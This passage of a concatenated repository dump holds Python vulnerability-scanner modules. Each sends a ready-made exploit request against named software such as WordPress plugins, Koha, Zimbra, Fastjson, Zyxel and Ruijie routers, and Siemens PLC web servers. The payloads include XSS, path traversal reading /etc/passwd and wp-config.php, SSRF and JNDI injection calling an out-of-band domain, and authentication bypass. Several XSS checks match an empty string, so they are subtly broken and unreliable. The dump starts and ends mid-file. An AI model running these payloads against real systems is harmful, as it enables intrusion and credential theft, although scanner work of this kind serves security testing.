"cvss-score": "6.1", 18 | "cve-id": "CVE-2014-4544", 19 | "cwe-id": "CWE-79" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2014", "wordpress", "wp-plugin", "xss"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if 
resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2020/CVE-2020-28208.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''RocketChat Unauthenticated Email enumeration''', 9 | "description": '''An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://trovent.io/security-advisory-2010-01" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", 16 | "cvss-score": "", 17 | "cve-id": "CVE-2020-28208", 18 | "cwe-id": "CWE-203" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2020", "rocketchat"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/api/v1/method.callAnon/sendForgotPasswordEmail""" 39 | method = "POST" 40 | data = """{"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":[\"user@local.email\"],\"id\":\"3\"}"}""" 41 | headers = {'Content-Type': 'application/json'} 42 | resp0 = 
requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if (resp0.status_code == 200) and ("""result\":false""" in resp0.text and """success":true""" in resp0.text): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/zimbra-preauth-ssrf.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from plugins.oob import verify_request, gen_oob_domain 3 | 4 | 5 | 6 | # Vuln Base Info 7 | def info(): 8 | return { 9 | "author": "cckuailong", 10 | "name": '''Zimbra Collaboration Suite (ZCS) - SSRF''', 11 | "description": '''A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code.''', 12 | "severity": "critical", 13 | "references": [ 14 | "https://www.adminxe.com/2183.html" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "", 18 | "cvss-score": "", 19 | "cve-id": "", 20 | "cwe-id": "" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["zimbra", "ssrf", "oast"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | 40 | oob_domain,flag = gen_oob_domain() 41 | 42 | path = 
"""/service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{oob_domain}%23.salesforce.com/""".format(oob_domain=oob_domain) 43 | method = "GET" 44 | data = """""" 45 | headers = {'Accept': '*/*'} 46 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 47 | 48 | if verify_request(type="dns", flag=flag): 49 | result["success"] = True 50 | result["info"] = info() 51 | result["payload"] = url+path 52 | 53 | except: 54 | result["success"] = False 55 | 56 | return result 57 | 58 | 59 | # Exploit, can be same with poc() 60 | def exp(url): 61 | return poc(url) 62 | 63 | 64 | # Utils 65 | def format_url(url): 66 | url = url.strip() 67 | if not ( url.startswith('http://') or url.startswith('https://') ): 68 | url = 'http://' + url 69 | url = url.rstrip('/') 70 | 71 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-4632.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Koha 3.20.1 - Directory Traversal''', 9 | "description": '''Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/37388", 13 | "https://www.cvedetails.com/cve/CVE-2015-4632" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 17 | "cvss-score": "7.5", 18 | "cve-id": "CVE-2015-4632", 19 | "cwe-id": "CWE-22" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", 
"lfi"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "root:" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2019/CVE-2019-6715.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''CVE-2019-6715''', 9 | "description": '''W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF''', 10 | "severity": "high", 11 | "references": [ 12 | "https://vinhjaxt.github.io/2019/03/cve-2019-6715", 13 | "http://packetstormsecurity.com/files/160674/WordPress-W3-Total-Cache-0.9.3-File-Read-Directory-Traversal.html" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2019-6715", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2019", "wordpress", "wp-plugin", "ssrf"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def 
fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """/wp-content/plugins/w3-total-cache/pub/sns.php""" 40 | method = "PUT" 41 | data = """{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}""" 42 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if ("""TmVzc3VzQ29kZUV4ZWNUZXN0""" in resp0.text): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/cves/2021/CVE-2021-3297.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass''', 9 | "description": '''On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2021-3297", 13 | "https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2021-3297", 19 | "cwe-id": "CWE-287" 20 | }, 21 | "metadata":{ 22 | 
"vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2021", "zyxel", "auth-bypass", "router"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """/status.htm""" 40 | method = "GET" 41 | data = """""" 42 | headers = {'Cookie': 'language=en; login=1'} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if (resp0.status_code == 200) and ("""Running Time""" in resp0.text and """Firmware Version""" in resp0.text and """Firmware Build Time""" in resp0.text): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-9608.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Netsweeper 4.0.3 - Cross-Site Scripting''', 9 | "description": '''A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2014-9608" 14 | ], 
15 | "classification": { 16 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 17 | "cvss-score": "6.1", 18 | "cve-id": "CVE-2014-9608", 19 | "cwe-id": "CWE-79" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2014", "netsweeper", "xss"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2017/CVE-2017-17562.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Embedthis GoAhead RCE''', 9 | "description": '''Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.elttam.com/blog/goahead/", 13 | "https://github.com/ivanitlearning/CVE-2017-17562", 14 | "https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562" 15 | ], 16 | 
"classification": { 17 | "cvss-metrics": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", 18 | "cvss-score": "", 19 | "cve-id": "CVE-2017-17562", 20 | "cwe-id": "CWE-20" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2017", "rce", "goahead", "fuzz"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | 40 | path = """/cgi-bin/{{endpoint}}?LD_DEBUG=help""" 41 | method = "GET" 42 | data = """""" 43 | headers = {'Accept': '*/*'} 44 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 45 | 46 | if (resp0.status_code == 200) and ("""environment variable""" in resp0.text and """display library search paths""" in resp0.text): 47 | result["success"] = True 48 | result["info"] = info() 49 | result["payload"] = url+path 50 | 51 | except: 52 | result["success"] = False 53 | 54 | return result 55 | 56 | 57 | # Exploit, can be same with poc() 58 | def exp(url): 59 | return poc(url) 60 | 61 | 62 | # Utils 63 | def format_url(url): 64 | url = url.strip() 65 | if not ( url.startswith('http://') or url.startswith('https://') ): 66 | url = 'http://' + url 67 | url = url.rstrip('/') 68 | 69 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/fastjson/fastjson-1-2-62-rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from plugins.oob import verify_request, gen_oob_domain 3 | 4 | 5 | 6 | # Vuln Base Info 7 | def info(): 8 | return { 9 | "author": "cckuailong", 10 | "name": '''Fastjson 1.2.62 Deserialization RCE''', 11 | "description": '''''', 12 | "severity": "critical", 13 | "references": [ 14 | "https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson", 15 | 
"https://github.com/wyzxxz/fastjson_rce_tool" 16 | ], 17 | "classification": { 18 | "cvss-metrics": "", 19 | "cvss-score": "", 20 | "cve-id": "", 21 | "cwe-id": "" 22 | }, 23 | "metadata":{ 24 | "vuln-target": "", 25 | 26 | }, 27 | "tags": ["fastjson", "rce", "deserialization", "oast"], 28 | } 29 | 30 | 31 | # Vender Fingerprint 32 | def fingerprint(url): 33 | return True 34 | 35 | # Proof of Concept 36 | def poc(url): 37 | result = {} 38 | try: 39 | url = format_url(url) 40 | 41 | oob_domain,flag = gen_oob_domain() 42 | 43 | path = """/""" 44 | method = "POST" 45 | data = { 46 | "@type":"org.apache.xbean.propertyeditor.JndiConverter", 47 | "AsText":"rmi://{oob_domain}/exploit".format(oob_domain=oob_domain) 48 | } 49 | headers = {'Content-Type': 'application/json'} 50 | resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 51 | 52 | if verify_request(type="dns", flag=flag): 53 | result["success"] = True 54 | result["info"] = info() 55 | result["payload"] = url+path 56 | 57 | except: 58 | result["success"] = False 59 | 60 | return result 61 | 62 | 63 | # Exploit, can be same with poc() 64 | def exp(url): 65 | return poc(url) 66 | 67 | 68 | # Utils 69 | def format_url(url): 70 | url = url.strip() 71 | if not ( url.startswith('http://') or url.startswith('https://') ): 72 | url = 'http://' + url 73 | url = url.rstrip('/') 74 | 75 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/ruijie/ruijie-nbr1300g-exposure.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Ruijie NBR1300G Cli Password Leak''', 9 | "description": '''''', 10 | "severity": "medium", 11 | "references": [ 12 | 
"http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html", 13 | "https://www.ruijienetworks.com" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["ruijie", "exposure"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """/WEB_VMS/LEVEL15/""" 40 | method = "POST" 41 | data = """command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.""" 42 | headers = {'Authorization': 'Basic Z3Vlc3Q6Z3Vlc3Q='} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if ("""webmaster level 2 username guest password guest""" in resp0.text) and (resp0.status_code == 200): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-5368.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''WordPress Plugin WP Content Source Control 
- Directory Traversal''', 9 | "description": '''A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2014-5368", 13 | "https://www.exploit-db.com/exploits/39287", 14 | "https://www.cvedetails.com/cve/CVE-2014-5368" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "", 18 | "cvss-score": "", 19 | "cve-id": "CVE-2014-5368", 20 | "cwe-id": "" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2014", "wordpress", "wp-plugin", "lfi"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php' 40 | 41 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 42 | if resp.status_code == 200 and "DB_NAME" in resp.text and "DB_PASSWORD" in resp.text: 43 | result["success"] = True 44 | result["info"] = info() 45 | result["payload"] = url+path 46 | 47 | except: 48 | result["success"] = False 49 | 50 | return result 51 | 52 | 53 | # Exploit, can be same with poc() 54 | def exp(url): 55 | return poc(url) 56 | 57 | 58 | # Utils 59 | def format_url(url): 60 | url = url.strip() 61 | if not ( url.startswith('http://') or url.startswith('https://') ): 62 | url = 'http://' + url 63 | url = url.rstrip('/') 64 | 65 | return url -------------------------------------------------------------------------------- /modules/cves/2020/CVE-2020-5777.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 
5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Remote Auth Bypass in MAGMI (Magento Mass Importer) Plugin <= v0.7.23''', 9 | "description": '''MAGMI versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure.''', 10 | "severity": "critical", 11 | "references": [ 12 | "https://github.com/dweeves/magmi-git/blob/18bd9ec905c90bfc9eaed0c2bf2d3525002e33b9/magmi/inc/magmi_auth.php#L35" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 16 | "cvss-score": "", 17 | "cve-id": "CVE-2020-5777", 18 | "cwe-id": "CWE-287" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2020", "magmi", "magento", "auth", "bypass", "plugin"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/index.php/catalogsearch/advanced/result/?name=e""" 39 | method = "GET" 40 | data = """""" 41 | headers = {'Connection': 'close'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if ("""Too many connections""" in resp0.text) and (resp0.status_code == 503): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-2908.py: 
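import requests


# Vuln Base Info
def info():
    """Return the static metadata record for this module.

    The dict is what ``poc()`` attaches under ``result["info"]`` on a
    positive match, so its field layout (author, name, description,
    severity, references, classification, metadata, tags) is part of the
    module's contract with the engine that loads it.
    """
    return {
        "author": "cckuailong",
        "name": '''Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting''',
        "description": '''A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.''',
        "severity": "medium",
        "references": [
            "https://www.exploit-db.com/exploits/44687",
            "https://cert-portal.siemens.com/productcert/pdf/ssa-892012.pdf",
            "https://nvd.nist.gov/vuln/detail/CVE-2014-2908"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "CVE-2014-2908",
            "cwe-id": ""
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["cve", "cve2014", "xss", "siemens"],
    }


# Vender Fingerprint
def fingerprint(url):
    """Vendor pre-check; this module performs none and accepts every target.

    ``url`` is unused. Returning True unconditionally means ``poc()`` is
    attempted against any host handed to the module.
    """
    return True


# Proof of Concept
def poc(url):
    """Probe ``url`` for the reflected XSS and return a result dict.

    Returns ``{"success": True, "info": ..., "payload": ...}`` on a match,
    ``{"success": False}`` when the request raises, and an empty dict when
    the request completed but the match condition was not met.
    """
    result = {}
    try:
        url = format_url(url)
        path = '/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter'

        # verify=False: TLS certificate validation is disabled for the probe;
        # allow_redirects=False: the first response is the one inspected.
        resp = requests.get(url + path, timeout=10, verify=False, allow_redirects=False)

        # NOTE(review): `"" in resp.text` is always True, so this match
        # reduces to "HTTP 200 with an HTML content type" and will flag any
        # HTML page (false positives). The reflected-marker check appears to
        # have been lost, possibly when the source was rendered; confirm the
        # intended marker against upstream before relying on this result.
        if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers):
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path

    except Exception:
        # Best-effort scanner semantics: any failure (network error, timeout,
        # unexpected response) is reported as a non-match rather than aborting
        # the run. Narrowed from a bare `except:` so that KeyboardInterrupt and
        # SystemExit still propagate and a scan can be interrupted cleanly.
        result["success"] = False

    return result


# Exploit, can be same with poc()
def exp(url):
    """Exploit entry point; identical to ``poc()`` for this module."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: trim whitespace, default to http://, strip trailing '/'.

    Args:
        url: host, host:port or full URL as supplied by the caller.

    Returns:
        The URL with surrounding whitespace removed, an ``http://`` scheme
        prepended when neither ``http://`` nor ``https://`` is present, and
        trailing slashes removed.
    """
    url = url.strip()
    if not url.startswith(('http://', 'https://')):
        url = 'http://' + url
    return url.rstrip('/')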
# ---- /modules/cves/2015/CVE-2015-2807.py ----
import requests


# Vuln Base Info
def info() -> dict:
    """Return the static metadata record for this check.

    NOTE(review): ``cve-id`` is blank although the file name and the NVD
    reference both carry CVE-2015-2807; the scanner output will lack the id.
    """
    return {
        "author": "cckuailong",
        "name": '''Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)''',
        "description": '''Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.''',
        "severity": "medium",
        "references": [
            "https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/",
            "https://nvd.nist.gov/vuln/detail/CVE-2015-2807"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "",
            "cwe-id": ""
        },
        "metadata":{
            "vuln-target": "",
        },
        "tags": ["cve", "cve2015", "wordpress", "wp-plugin", "xss"],
    }


# Vender Fingerprint
def fingerprint(url: str) -> bool:
    """Vendor pre-check; unconditionally True."""
    return True

# Proof of Concept
def poc(url: str) -> dict:
    """Send one GET to the plugin's window.php and report a match.

    Returns ``{"success": True, "info": ..., "payload": <url>}`` on a match,
    ``{}`` when nothing matched, ``{"success": False}`` on any exception.

    NOTE(review): ``"" in resp.text`` is always True, so the effective test is
    "HTTP 200 and text/html anywhere in the headers". The reflected marker is
    never looked for; a 200 HTML page at that path is enough for a positive.
    """
    result = {}
    try:
        url = format_url(url)
        path = '/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

        # verify=False disables TLS certificate validation; redirects are not followed.
        resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)
        if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers):
            result["success"] = True
            result["info"] = info()
            result["payload"] = url+path

    # NOTE(review): bare except swallows every exception and reports success=False.
    except:
        result["success"] = False

    return result


# Exploit, can be same with poc()
def exp(url: str) -> dict:
    """Exploit entry point; identical to ``poc()`` for this module."""
    return poc(url)


# Utils
def format_url(url: str) -> str:
    """Normalise a target string: trim whitespace, default to http://, drop trailing '/'."""
    url = url.strip()
    if not ( url.startswith('http://') or url.startswith('https://') ):
        url = 'http://' + url
    url = url.rstrip('/')

    return url


# ---- /modules/cves/2018/CVE-2018-8033.py ----
import requests


# Vuln Base Info
def info() -> dict:
    """Return the static metadata record for this check."""
    return {
        "author": "cckuailong",
        "name": '''Apache OFBiz XXE''',
        "description": '''XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04''',
        "severity": "high",
        "references": [
            "https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E"
        ],
        "classification": {
            "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "cvss-score": "",
            "cve-id": "CVE-2018-8033",
            "cwe-id": "CWE-200"
        },
        "metadata":{
            "vuln-target": "",
        },
        "tags": ["cve", "cve2018", "apache", "ofbiz", "xxe"],
    }


# Vender Fingerprint
def fingerprint(url: str) -> bool:
    """Vendor pre-check; unconditionally True."""
    return True

# Proof of Concept
def poc(url: str) -> dict:
